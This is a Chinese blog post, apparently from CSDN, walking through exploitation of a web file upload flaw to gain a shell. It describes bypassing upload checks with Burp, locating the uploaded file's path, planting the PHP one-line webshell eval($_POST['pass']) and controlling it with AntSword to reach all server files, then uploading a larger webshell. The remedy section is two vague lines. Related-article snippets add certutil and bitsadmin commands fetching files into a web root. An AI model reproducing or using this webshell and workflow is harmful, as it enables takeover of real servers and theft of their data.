文件上传漏洞实战getshell分析 形成 利用 修复

已于 2023-03-22 21:55:40 修改
阅读量1.1k 收藏 4
点赞数 7
文章标签: 文件上传漏洞 webshell Burp Suite 安全防护 PHP过滤
于 2022-12-20 15:47:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74245209/article/details/128385440
版权

文件上传漏洞利用及分析和修复

 

 

 

前言

文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。 文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的。

 

提示:以下是本篇文章正文内容,下面案例可供参考

一、webshell是什么?

简单说吧,他是正向木马。即为我们主动去找他

二、文件上传漏洞利用实战

1.上传

一般是后台。头像啥的

c40ab72e4a0946839a0081997c4fe744.png

 0e60a5298bca4e079db4076b5918c684.png

好了,我们来找找

9631b8ef2e1e44e6bb15351bae63ac00.png

5f3cd8b4e16742e289843a7e3ad6f2d5.png

OK。如果他限制我们上传,就得用点手段了。。。。

直接burp截包改数据类型,

74a18c3dde684a6d8400fc3118ccf3de.png

 成功~!!

现在。F12开发者工具

03a8ebd23d614170aceceb45e292907e.png

 将元素审查针放到bak1.php

<input type="hidden" name="url1" id="h_url1" value="/uploads/20221220/76b9aff7d53c20d94b7144b77bd08611.php">
下面拼接URL 
http://www.xxx.com/uploads/20221220/76b9aff7d53c20d94b7144b77bd08611.php

以上就是小马地址

<?php
eval($_POST["pass"]);

上蚁剑

c16ffd4fa6ac40f681a843ff522edb4b.png

 

f6ac35f6c8f240a390fbd445f20a1f7f.png

 可访问服务器全部文件

拉大马。并访问

 源码看我之前文

 

1b5a9225ea034b839f5ce9f537d033c0.png

2.防止

加入严格的后端限制

php过滤危险函数

 

 

总结

以上是全部内容,感谢关注。可以私我学习

 

摇柏
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
如何利用文件上传漏洞-以及如何修复它们
简介
02-18 3326
目录什么是文件上传漏洞文件上传请求如何工作为什么文件上传漏洞是个问题?漏洞 #1:通过文件内容远程代码执行(Web Shell 上传)绕过黑名单保护案例 1:案例 2:案例 3:案例 4:绕过白名单保护案例 1: 绕过文件扩展名检查案例 2:空字节注入漏洞 #2:通过 SVG 文件案例 1:SSRF案例二:XXE案例 3:跨站脚本漏洞 #3:通过文件名案例 1:DoS(拒绝服务)案例 2:XSS(跨站脚本)漏洞 #4:通过文件大小案例 1:如何防范和缓解文件上传漏洞最后 𝓲’𝓶 𝓪 𝓵𝓾𝓷𝓪𝓽𝓲𝓬, 𝓱
泛微OA9前台无限制getshell
Jay
06-05 1690
漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,利用简单,自评高危!!
windows系统getshell后上传文件
arr的博客
05-29 190
bitsadmin /transfer myDownloadJob /download /priority normal https://xxx.com/temp.zip C:\xxx\wwwroot\xxx\xxx\inst\temp\temp.zipcertutil -urlcache -split -f https://xxx.com/html.zip C:\xxx\wwwroot\xxx\xxx\xxx\acticle\temp.ziptar -xf C:\xxx\wwwroot\xxx\xxx\i
文件上传漏洞(upload-labs)复现(1~9)
net的博客
02-23 778
在上述配置中,FilesMatch表示匹配4.png的文件,当该文件名匹配成功后,SetHandler表示将该文件作为PHP类型的文件来进行处置。复制文件上传的路径,请求 GET /upload/upload/20200304.php5?④复制文件上传的路径,请求GET /upload/upload/webshell.php?①分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件上传。②上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐);
上传文件的漏洞复现与修复
菼执的博客
10-21 6824
本文只说一些我遇到过的上传文件的漏洞。 工具:我装了kali,使用 burpsuite;Linux环境下的VirtualBox 要配一下,burpsuite的 proxy-->options 自己去哔哩哔哩找一下资料了解一下burpsuite的使用。 漏洞一:直接上传jsp、php、jspx、exe等这种在黑名单的文件。上传成功后,可以使用冰蝎等webshell工具去getshell ...
文件上传漏洞训练平台.zip
10-14
10. **利用与防御实战**:通过实战模拟,学习如何检测、利用修复实际环境中的文件上传漏洞。 在每个关卡中,你可能会遇到不同的挑战,通过解谜和实践,加深对文件上传漏洞原理和防范手段的理解。完成训练后,你...
实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1
08-03
实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1 在本文中,我们将深入探讨MIPCMS内容管理系统V3.1.0中的一个安全漏洞,该漏洞允许攻击者通过远程写入配置文件实现Getshell。MIPCMS是一款基于PHP的开源内容...
实战篇】第19篇:ThinkSNS_V4 后台任意文件下载导致Getshell1
08-03
这篇文章是关于ThinkSNS V4版本的一个安全漏洞实战分析,该漏洞允许攻击者通过任意文件下载来实现Getshell,即获取服务器的控制权。ThinkSNS是一款流行的社交网络平台,用于为企业和个人提供社交软件解决方案。在...
AttackWebFrameworkTools:傻瓜式导入URL即可实现批量测试,能一键getshell检测绝不sql注入或不是只检测。其中thinkphp集成所有rce Exp Struts2集成了shack2和k8漏洞利用工具所有Exp他们他们的exp进行优化和修复此工具的所集成的整体漏洞是基于平时实战中所得到的经验从而写入到工具里。例如:通达oA一键getshell实战测试struts2一键getshell等等
02-16
AttackWebFrameworkTools 1.0 2021-02-15ReadTeam的AttackWebFrameworkTools更新状态日志: 2021-02-15新增activemq exp / poc 2021-02-14更新solr exp / poc结果增加了cve编号和断裂名称2021-02-12更新solr 4个exp ...
实战篇】第17篇:PHPYun_v4.3 CMS重装到Getshell1
08-03
实战篇】第17篇:PHPYun_v4.3 CMS重装到Getshell1是一篇关于PHPYun CMS系统的安全分析文章。PHPYun是一款广泛使用的人才招聘管理系统,但文中指出该系统存在一些安全漏洞。以下是文章中涉及的知识点详解: 1. **...
文件上传漏洞
F2444790591的博客
06-18 6086
攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本到服务器上,然后访问这些恶意脚本中包含的恶意代码,从而获得了执行服务器端命令的能力,进一步影响服务器安全。可能会导致用户信息泄露,被钓鱼,甚至使攻击者可以直接上传WebShell到服务器,进而得到自己想要的信息和权限,最终达到对数据库执行、服务器文件管理、服务器命令执行等恶意操作,甚至完全控制服务器系统。 前端检测原理:调用JS的selectFile()函数,将文件名转化为小写,然后通过substr获取文件名最后一个点好后
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 2975
我相信,你在开发Web应用时,后端一定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
文件上传漏洞原理以及修复方法
it知识分享 free for nothing..
12-25 1524
文件上传漏洞原理以及修复方法
文件上传漏洞漏洞的危害和修复方案
qq_61861243的博客
03-29 2082
文件上传漏洞漏洞的危害和修复方案
Get Shell! — 绕过防护上传木马
qq_52108058的博客
11-14 805
web的含义显然是需要服务器开放web服务shell是一个人机交互页面拿shell的含义是取得对服务器/电脑某种程度上的操作权限webshell拿到网站服务器的权限(shell)木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。
神兵利器 | HW常见OA利用工具(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-13 674
常见OA漏洞利用检测工具Tools-1Tools-2Tools-3后台回复tools,获取工具。
Web安全:文件上传漏洞测试(防止 黑客利用漏洞.)
网络安全领域___专研者.
05-21 2529
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
漏洞复现-monstra-文件上传】vulfocus/monstra_cve_2020_13384
10-10 1328
【monstra-文件上传】后缀的理解
后台文件上传getshell漏洞怎么解决漏洞
最新发布
06-29
后台文件上传中的 GETshell 漏洞通常发生在服务器处理文件上传请求时,如果未正确验证上传文件类型、大小或内容,恶意用户可能会上传包含恶意脚本的文件,这些脚本可以在服务器上执行,从而获取系统的控制权(shell...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值